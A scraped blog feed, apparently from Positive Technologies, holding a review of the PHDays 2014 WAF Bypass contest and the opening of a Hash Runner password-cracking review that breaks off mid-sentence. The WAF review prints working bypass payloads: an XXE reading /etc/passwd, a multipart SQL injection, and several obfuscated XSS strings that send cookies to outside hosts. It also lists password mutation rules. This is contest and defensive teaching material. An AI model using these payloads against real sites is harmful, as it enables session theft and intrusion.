src="http://3.bp.blogspot.com/-kYDmF5IbWuk/U8YmWaCKVTI/AAAAAAAAEP0/qR8elIQ8nPo/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-16+%D0%B2+11.14.16.png" height="306" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><i>* Without 20 points for 2.4 task</i></div><div><br /></div><div><br /></div></div>Unknownnoreply@blogger.com455tag:blogger.com,1999:blog-5176771794789502609.post-29567494111138021532014-07-14T13:59:00.000+04:002014-07-14T13:59:05.266+04:00Review of WAF Bypass Tasks<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/db2/b02/4cb/db2b024cb93726a1b6b3b44da0f4dc1b.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/db2/b02/4cb/db2b024cb93726a1b6b3b44da0f4dc1b.jpg" height="200" width="200" /></a></div>This year, the visitors of the Positive Hack Days Forum were invited to have a shot at bypassing the <a href="http://www.ptsecurity.com/what_we_do/application-firewall/" target="_blank">PT Application Firewall</a> in the contest called WAF Bypass. It was a good opportunity for us to test our product in action, because the forum gathered the best information security experts. We had prepared a set of tasks for the contest, each representing a script with a typical vulnerability.<br /><br />The participants were invited to use these vulnerabilities to get flags. All tasks were solvable, though some solutions were not obvious. The contestants were provided with the report about scanning the tasks' source code with another Positive Technologies product Application Inspector. In this article, we will consider the contest tasks, bypassing methods, and the experience we have obtained.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/65c/710/9f5/65c7109f5f3dd8e73f7c14335b2084c2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/65c/710/9f5/65c7109f5f3dd8e73f7c14335b2084c2.png" height="112" width="640" /></a></div><a name='more'></a><br /><b><span style="font-size: large;">1. XXE</span></b><br /><br />The first task included a PHP-based XMLRPC server vulnerable to XML External Entities Injection. Here is this vulnerability detected by the Application Inspector:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/7cc/ac0/ecf/7ccac0ecf342a2e93ab0c0d6986ddc9a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/7cc/ac0/ecf/7ccac0ecf342a2e93ab0c0d6986ddc9a.png" height="640" width="388" /></a></div><br />This task was warm-up and the Application Firewall was configured to block only simple XXE:<br /><br /><span style="font-family: Courier New, Courier, monospace;"><!DOCTYPE input [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><input>&xxe;</input></span><br /><br />For example, a participant could obtain the flag using parameter entities:<br /><br /><span style="font-family: Courier New, Courier, monospace;"><?xml version="1.0" encoding="UTF-8"?></span><br /><span style="font-family: Courier New, Courier, monospace;"><!DOCTYPE foo [</span><br /><span style="font-family: Courier New, Courier, monospace;"><!ELEMENT foo ANY ></span><br /><span style="font-family: Courier New, Courier, monospace;"><!ENTITY % xxe SYSTEM "flag" ></span><br /><span style="font-family: Courier New, Courier, monospace;">%xxe;</span><br /><span style="font-family: Courier New, Courier, monospace;">]></span><br /><span style="font-family: Courier New, Courier, monospace;"><body></span><br /><span style="font-family: Courier New, Courier, monospace;"><method a='a'>test</method></span><br /><span style="font-family: Courier New, Courier, monospace;"></body></span><br /><br />Another way was through DOCTYPE:<br /><br /><span style="font-family: Courier New, Courier, monospace;"><?xml version="1.0" encoding="UTF-8"?></span><br /><span style="font-family: Courier New, Courier, monospace;"><!DOCTYPE body SYSTEM "flag"></span><br /><span style="font-family: Courier New, Courier, monospace;"><body><method>test</method></body></span><br /><br /><b><span style="font-size: large;">2. SQL Injection</span></b><br /><br />In this task, the goal was to obtain the flag from the database using SQL Injection. Most contestants tried to bypass the filter instead of paying attention to the hint: it was necessary to find a weakness in the WAF configuration, which was improper data normalization. In fact, data normalization is amongst the most serious problems of modern WAFs. Improper implementation can give attackers protocol-level ways of firewall bypassing. As Stefan Esser mentioned in his presentation <a href="http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf" target="_blank">Shocking News in PHP Exploitation</a> far back in 2009, WAF developers try to create a general HTTP parser for all existing implementation, which is obviously impossible. The approach implemented in the PT Application Firewall consists in normalization considering back-end peculiarities. In the task, normalization was disabled, which made the following bypass possible:<br /><br /><span style="font-family: Courier New, Courier, monospace;">POST /news.php HTTP/1.1</span><br /><span style="font-family: Courier New, Courier, monospace;">Host: task2.waf-bypass.phdays.com</span><br /><span style="font-family: Courier New, Courier, monospace;">Accept: */*</span><br /><span style="font-family: Courier New, Courier, monospace;">Accept-Language: en</span><br /><span style="font-family: Courier New, Courier, monospace;">User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</span><br /><span style="font-family: Courier New, Courier, monospace;">Connection: close</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Type: multipart/form-data; boundary=------,xxxx</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Length: 191</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">------,xxxx</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Disposition: form-data; name="img"; filename="img.gif"</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">GIF89a</span><br /><span style="font-family: Courier New, Courier, monospace;">------</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Disposition: form-data; name="id"</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">1' union select null,null,flag,null from flag limit 1 offset 1-- -</span><br /><span style="font-family: Courier New, Courier, monospace;">--------</span><br /><span style="font-family: Courier New, Courier, monospace;">------,xxxx--</span><br /><br />PHP has its own unique parser of multipart data that takes the part of the Content-Type header before comma as boundary, while normal parsers take the entire string. Therefore, if there is no proper normalization, then the WAF will not check the parameter because it will see a file in it. However, PHP will recognize a regular parameter instead of file input and the payload will be successfully delivered.<br /><br /><b><span style="font-size: large;">3. httpOnly</span></b><br /><br />This one and all subsequent tasks were about client-side vulnerabilities. We developed a bot in Selenium that had special cookies with a flag. The goal was to steal these cookies.<br /><br />HttpOnly is a cookie flag restricting access via non-HTTP means such as JavaScript (hence the task name).<br /><br />Here is the vulnerable script code:<br /><br /><span style="font-family: Courier New, Courier, monospace;"><h4>httpOnly bypass</h4></span><br /><span style="font-family: Courier New, Courier, monospace;"><p>In this task you need to bypass httpOnly and steal bot cookies using</span><br /><span style="font-family: Courier New, Courier, monospace;"><a href="http://waf-bypass.phdays.com/#bot">http://waf-bypass.phdays.com/#bot</a>.</span><br /><span style="font-family: Courier New, Courier, monospace;">All XSS checks are disabled, but there is an intentional bug, try to find it!</p></span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;"><?php</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">if(!isset($_GET['name'])) die("<p>Please provide name</p>");</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">if($_SERVER['REMOTE_ADDR'] == '127.0.0.1') {</span><br /><span style="font-family: Courier New, Courier, monospace;"> setcookie('flag', $_GET['name'] . '-' . file_get_contents('./flag'));</span><br /><span style="font-family: Courier New, Courier, monospace;">} else {</span><br /><span style="font-family: Courier New, Courier, monospace;"> setcookie('flag', $_GET['name'] . '-' . md5(mt_rand()));</span><br /><span style="font-family: Courier New, Courier, monospace;">}</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">echo '<p>' . $_GET['name'] . '</p>';</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">?></span><br /><br />Let us draw your attention to the following: the user value gets into the cookie value and the input data is reflected to the response body as is. It is evident that if the bot follows a link with XSS, it will not send its cookies, because the Application Firewall has set the httpOnly flag. To bypass this protection mechanism, it was necessary to specify the string "httpOnly" in the cookie value, so that the WAF decided that the flag had been already set and it's not necessary to add another one.<br /><br /><span style="font-family: Courier New, Courier, monospace;">httponly.php?name=<script>document.location.href='http://sniffer.com?'%2bdocument.cookie</script>;HttpOnly</span><br /><br /><span style="font-size: large;"><b>4. Anomaly</b></span><br /><br />In this task, the contestants were invited to examine the mechanism of anomalies detection that uses machine-learning algorithms the PT Application Firewall is based on. A statistical model was trained on a very loose subset of samples, and so it became overfit (i.e. considering too large specter of values as legitimate). The bypass method was to generate such s string that will fit the parameters of the trained statistical model. In this case, there also was a Cross-Site Scripting vulnerability, but the httpOnly property wasn't set. Even such weakened statistical model was bypassed only by two contestants:<br /><br /><span style="font-family: Courier New, Courier, monospace;">aaaaaaaaaaaa ... [snip] ... aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaav%3Cvideo+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa+src=//secsem.ru+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa+onerror=src%2b=document.cookie+aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/%3E</span><br /><br />It should be mentioned that to "dilute" special characters detected by the WAF, the value of a tag attribute in another attribute was addressed. The latter attribute was located far enough for the string not to go beyond the threshold.<br /><br /><b><span style="font-size: large;">5. RegEx</span></b><br /><br />In this task, the goal was to bypass a filter that uses regular expressions and to steal the bot's cookie. The essential part of any traditional WAF are signatures based on regular expressions. Here, we saw once more that a good WAF shouldn't count on regexps only. Some bypass methods are given below:<br /><br /><span style="font-family: Courier New, Courier, monospace;"><img src = http://dsec.ru/bitrix/templates/dsec/img/logo.png onload = \"\\u0064\\u006F\\u0063\\u0075\\u006D\\u0065\\u006E\\u0074.write('<im\\u0067 src = http://sergeybelove.ru?ccc='%2b\\u0064\\u006F\\u0063\\u0075\\u006D\\u0065\\u006E\\u0074.cooki\\u0065%2b'>')\"></span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">1%3Cvideo%20%20src%3dx%20onerror%3d%0Asrc='ht'%2b'tp:'%2b'//'+d\\u006fcument['\\x63ookie']%3E%3C/video%3E</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;"><svg onload=\"var xStuff=HTMLElement['con'%2b'structor'],yStuff=xStuff('var img=new'%2b' Ima'%2b'ge('%2b') ;im'%2b'g.sr'%2b'c=\\'http:/'%2b'/labs.tom.vg/cookie=\\'%2bdoc'%2b'ument.coo'%2b'kie;doc'%2b'ument.doc'%2b'umentEl'%2b'ement.appe'%2b'ndCh'%2b'ild'%2b'('%2b'img) ;'),zStuff=yStuff()\"></span><br /><br /><b><span style="font-size: large;">6. Sanitize</span></b><br /><br />In the last task, the contestants were invited to implement XSS after having bypassed a protection system that consisted in encoding of input values reflected in responses into HTML entities.<br /><br /><span style="font-family: Courier New, Courier, monospace;">GET /sanitize.php?name=<script>alert(1)</script> HTTP/1.0</span><br /><br />-><br /><br /><span style="font-family: Courier New, Courier, monospace;">HTTP/1.0 200 OK</span><br /><span style="font-family: Courier New, Courier, monospace;">...</span><br /><span style="font-family: Courier New, Courier, monospace;">Hello, &lt;script&gt;alert(1)&lt;/script&gt;!</span><br /><br />It seems that such protection is perfect, but there was a way to bypass it. To find the value entered by a user, the search is performed through the entire HTTP-response body, which can include other HTML tags as well. The bypass idea was to trick the WAF into escaping the tags already present in the response so that the target payload wasn't filtered.<br /><br /><b><span style="font-size: large;">Results</span></b><br /><br />The winner was a Moscow State University team consisting of Georgiy Noseevich, Andrey Petukhov, and Alexander Razdobarov. They managed to solve all the tasks! Ivan Novikov (d0znpp) took the second place and Tom Van Goethem, a speaker from Belgium, was the third. All the three medal places were awarded with valuable prizes: Apple iPad Air, Sony Xperia Z2, and an annual license for Burp Suite Pro, respectively.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/d40/06b/72a/d4006b72a4a837a3ccf3c68b56a6aba2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/d40/06b/72a/d4006b72a4a837a3ccf3c68b56a6aba2.png" height="292" width="640" /></a></div><br />A bit of statistics: during the two contest days, <b>122 644 </b>requests were blocked, <b>101</b> contestants registered and only <b>11</b> of them managed to obtain at least one flag.<br /><br />Day one dynamics<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/83f/a55/956/83fa559564dc65bb0ccdba93cbb2ab2d.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/83f/a55/956/83fa559564dc65bb0ccdba93cbb2ab2d.png" height="182" width="640" /></a></div><br />Day two dynamics<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/e98/a3d/734/e98a3d734227e8f0803c8bcba208e0eb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/e98/a3d/734/e98a3d734227e8f0803c8bcba208e0eb.png" height="180" width="640" /></a></div><br />Statistics by attacks<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/3cb/2ba/452/3cb2ba45266fe0793f02a3683af29652.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/3cb/2ba/452/3cb2ba45266fe0793f02a3683af29652.png" height="418" width="640" /></a></div><br />Statistics by tasks<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/37f/d84/7b8/37fd847b89c1919fe1fb7d7992c28be1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/37f/d84/7b8/37fd847b89c1919fe1fb7d7992c28be1.png" height="342" width="640" /></a></div><br />By the way, we implemented cool visualization with <a href="https://www.youtube.com/watch?v=HeWfkPeDQbY" target="_blank">logstalgia</a> for this contest.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://habrastorage.org/getpro/habr/post_images/f6e/3c7/441/f6e3c744140a99c988cca83a51526ea0.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://habrastorage.org/getpro/habr/post_images/f6e/3c7/441/f6e3c744140a99c988cca83a51526ea0.jpg" height="480" width="640" /></a></div><br /><br />There we have it :)<br /><br /><i>Arseniy Reutov, Dmitriy Nagibin and PT Application Firewall Team</i></div>Unknownnoreply@blogger.com2698tag:blogger.com,1999:blog-5176771794789502609.post-25033304264480249862014-07-08T15:19:00.000+04:002014-07-08T15:20:14.917+04:00Review of Hash Runner Tasks<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><b><span style="font-size: large;">Intro</span></b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-oRlgE8VkMWk/U7vPLaKHDYI/AAAAAAAAEEY/reZGb4hlUd4/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-oRlgE8VkMWk/U7vPLaKHDYI/AAAAAAAAEEY/reZGb4hlUd4/s1600/1.png" /></a></div>This year, Hashrunner had been taking place during three days before Positive Hack Days — from May, 16 19:00 (UTC+4, Moscow) till May, 19 19:00 (UTC+4, Moscow). Among other matters, we were trying to respect the interests of all geographically dispersed teams and cover 48 hours of two weekend days for every time zone. We received great positive feedback about including the whole weekend and thus we’ll try to keep it this way.<br /><br />Congratulations to the winners!<br /><br /><ol style="text-align: left;"><li>InsidePro with 22.81% (<a href="http://www.phdays.ru/download/Write-up.pdf" target="_blank">write-up</a>) won two R290x video cards plus souvenirs.</li><li>hashcat with 21.23% (<a href="http://hashcat.net/forum/thread-3397.html" target="_blank">write-up</a>) won an R290x video card plus souvenirs.</li><li>john-users with 12.78% (<a href="http://openwall.com/lists/john-users/2014/05/29/2" target="_blank">write-up</a>) won souvenirs.</li></ol><br />Within three years of the contest, we had three unique winners: hashcat in 2012, john-users in 2013, and InsidePro in 2014. Every year, most submissions were received in the last 15 minutes and thus the winner was determined in the very nick of time. In 2012 and 2013, InsidePro was beaten into the second place by hashcat and john-users, respectively. This year, InsidePro finally became the first.<br /><a name='more'></a><br /><b><span style="font-size: large;">Hash Types and Pricing</span></b><br />Hash prices included weights assigned according to our own practical needs. It was our final decision, but we had considered two other ideas — with one hash giving one point and with prices calculated both from the plaintext entropy and the average cracking time (obtained on our standard hardware) for the certain hash type. The latter variant proved to be unsuitable for the competition, because only the slowest hashes would have mattered.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-8qyLnnIn0Vc/U7vQ1EBYkBI/AAAAAAAAEEo/eGFqxPqpD3c/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-08+%D0%B2+15.06.38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-8qyLnnIn0Vc/U7vQ1EBYkBI/AAAAAAAAEEo/eGFqxPqpD3c/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-08+%D0%B2+15.06.38.png" height="400" width="302" /></a></div><br />* coefficient for hashes in bonus packs<br /><br /><b><span style="font-size: large;">Contest Mechanics</span></b><br />First of all, we split the entire contest into separate tasks that reflected different systems and approaches, not only hash types. It was quite like Hash Runner 2013, but without tasks being tied to wordlists, the theme of which could be guessed from hints or restored plaintexts.<br /><br />One of new features of Hash Runner 2014 was how contestants received their hashes. In previous years, it had been a plaintext file. This year, we had a special laboratory running real-life systems. To grab hashes, contestants followed the instructions and used exploits like in pentests. These tasks were completely described without any space left for guessing, except the hash cracking itself. You could see PCAP files, Lotus Domino installation, numerous web applications, SCADA project files, etc. It had no impact on scoring, but was just for pentest look & feel — and to be honest, became the hardest part for us to implement.<br /><br />Furthermore, typical assessment doesn’t require all these unprivileged users; you need only the most privileged one. We added twenty-three admin hashes for each task that had the largest entropy of task plaintexts (twenty-three is just a number not anyhow related to the result of 966/42). If a participant managed to crack any admin hash, he/she was awarded with 250 bonus hashes not available in the original task. The bonus hashes types were: Raw-SHA-1, GOST, bcrypt, and Raw-MD5.<br /><br /><b><span style="font-size: large;">Accidents & Emergencies</span></b><br />As seen on the news:<br /><blockquote class="tr_bq">Results uploading was buggy if the plaintext contained ":". Not that we hadn't expected this :) </blockquote><blockquote class="tr_bq">Some piece of information: due to some our mistakes made with hash dumping for the task #3 (md4 mt_rand), data from user.db.php and hashrunner_2014_hashes.zip did not match. The latter file was correct and hashes from it would have been accepted. The task became two times easier now. We couldn’t disclose the exact information, because one team had found it on their own. Other teams were invited to find and use this glitch to upload hashes for this task. </blockquote><br />Awful silent patches:<br /><br /><ol style="text-align: left;"><li>Cisco hashes had been generated twice by accident and thus were different because of the salt in algorithms.</li><li>We had wrong scores in the database for one of the bonus hashes (1 instead of 15). Fortunately, it was found during day one, when almost nobody had succeeded with these bonus hashes.</li><li>Some minor differences between the file with all hashes and the actual systems.</li></ol><br /><b><span style="font-size: large;">Wordlists and Mutations</span></b><br />Wordlists used came from real life experience with a pinch of broken fantasy:<br />random 6 and 8 chars, acronyms, Arabic mapped to Latin, Arabic forum (crawled), Arabic names, Canada towns, chemicals, Chinese names and surnames, Go game terms, Greek mythology, Hollywood stars, Italian cities, legendary creatures, Marvel characters, mental disorders, MMORPG sites, neurological disorders, tomato translations, web application banners and random samples from packetstorm wordlists and xato 10k wordlist.<br /><br />Mutations used were those generally found during consulting mixed with uncommon cases:<br /><br />• Leet everything, leet only specific alpha, leet random.<br />• Simple ones: <word><year>, <word><digit1><digit2><digit3>, <word><spec><year>, <word><date>, <word><date><month>.<br />• Permutations with case in <word> like <WoRD> and <wORD>. These mutations were mostly used in wordlists like mental disorders and legendary creatures.<br />• Ultra evil <word1><WORD2>, <word1><word2><word3>.<br />• Adding special symbols: <special1><word><special2>, <word><special1><special2<special3><special4>.<br />• Arabic mapped to Latin also should be considered as a mutation. A simple Arabic wordlist was mapped to the corresponding Latin keyboard chars. Like “password” in Russian (“пароль”) typed in English layout gives “gfhjkm”.<br /><br />All these mixed up and mutated wordlists were randomly distributed among the tasks. The number of final plaintexts exceeded 40 thousands. Hopefully, we avoided attacks with themed patterns through using only small random parts of this set.<br /><br /><b><span style="font-size: large;">Review of Some Tasks</span></b><br /><br /><b>TIA Portal</b><br />The simplest task in the contest. SCADA engineering solution that had raw SHA-1 hashes with known plaintext length. That’s it. By modifying the provided script to extract the length as shown on picture, you got massive 